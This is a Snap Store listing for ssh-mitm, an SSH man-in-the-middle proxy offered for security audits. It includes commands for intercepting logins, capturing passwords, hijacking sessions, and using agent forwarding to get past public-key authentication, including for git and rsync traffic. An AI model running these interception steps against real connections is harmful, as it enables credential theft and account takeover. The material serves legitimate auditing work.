ssh-mitm

ssh-mitm

Manfred Kaiser (ssh-mitm) Publisher
  • Manfred Kaiser (ssh-mitm) Publisher

Install latest/stable of ssh-mitm

Ubuntu 16.04 or later?

Make sure snap support is enabled in your Desktop store.


Install using the command line

sudo snap install ssh-mitm

Don't have snapd? Get set up for snaps.

Channel Version Published

ssh mitm server for security audits

ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation

Features

  • Hijacking and logging of terminal sessions
  • support for ssh commands (e.g. git over ssh)
  • SCP and SFTP
    • store files
    • replace files
    • inject additional files
  • Agent Forwarding
  • Port Forwarding
  • Check and test clients against known vulnerabilities
  • Plugin support

Connect to the network

To start an intercepting mitm-ssh server on Port 10022, all you have to do is run a single command.

$ ssh-mitm --remote-host 192.168.0.x

Now let's try to connect to the ssh-mitm server.

$ ssh -p 10022 user@proxyserver

You will see the credentials in the log output.

 2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:
     Remote Address: 192.168.0.x
     Port: 22
     Username: user
     Password: supersecret
     Key: None
     Agent: None

Hijack SSH sessions

When a client connects, the ssh-mitm starts a new server, which is used for session hijacking.

[INFO] created injector shell on port 34463

To hijack this session, you can use your favorite ssh client. All you have to do is to connect to the hijacked session.

$ ssh -p 34463 127.0.0.1

Advanced usage

SSH-MITM proxy server is capable of advanced man in the middle attacks and can be used in scenarios, where the remote host is not known or a single remote host is not sufficient or public key authentication is usded.

Public key authentication

Public key authentication is a way of logging into an SSH/SFTP account using a cryptographic key rather than a password.

The advantage is, that no confidential data needs to be sent to the remote host which can be intercepted by a man in the middle attack.

Due to this design concept, SSH-MITM proxy server is not able to reuse the data provided during authentication.

It you need to intercept a client with public key authentication, there are some options.

SSH supports agent forwarding, which allows a remote host to authenticate against another remote host.

SSH-MITM proxy server is able to request the agent from the client and use it for remote authentication. By using this feature, a SSH-MITM proxy server is able to do a full man in the middle attack.

Using agent forwarding, SSH-MITM proxy server must be started with --request-agent.

$ ssh-mitm --request-agent --remote-host 192.168.0.x

The client must be started with agent forwarding enabled.

$ ssh -A -p 10022 user@proxyserver

Intercept git

In most cased, when git is used over ssh, public key authentication is used. The default git command does not have a forward agent parameter.

To enable agent forwarding, git has to be executed with the ``GIT_SSH_COMMAND`` environment variable.

 # start the ssh server
 ssh-mitm --remote-host github.com --request-agent --scp-interface debug_traffic
 # invoke git commands
 GIT_SSH_COMMAND="ssh -A" git clone ssh://git@127.0.0.1:10022/ssh-mitm/ssh-mitm.git

Intercept rsync

When ssh-mitm is used to intercept rsync, the port must be provided as a parameter to rsync. Also the agent can be forwarded, if needed.

To sync a local directory with a remote directory, rsync can be executed with following parameters.

 rsync -r -e 'ssh -p 10022 -A' /local/folder/ user@127.0.0.1:/remote/folder/

Further steps

SSH-MITM has some client exploits integrated, which can be used to audit various ssh clients like OpenSSH and PuTTY.

Full Documentation: https://docs.ssh-mitm.at

Developer website

Contact Manfred Kaiser

Details for ssh-mitm

License
LGPL-3.0-or-later
Last updated
16 July 2021

Share this snap

Generate an embeddable card to be shared on external websites.


Related blog posts


Install ssh-mitm on your Linux distribution

Choose your Linux distribution to get detailed installation instructions. If yours is not shown, get more details on the installing snapd documentation.


Is there a problem with ssh-mitm? Report this app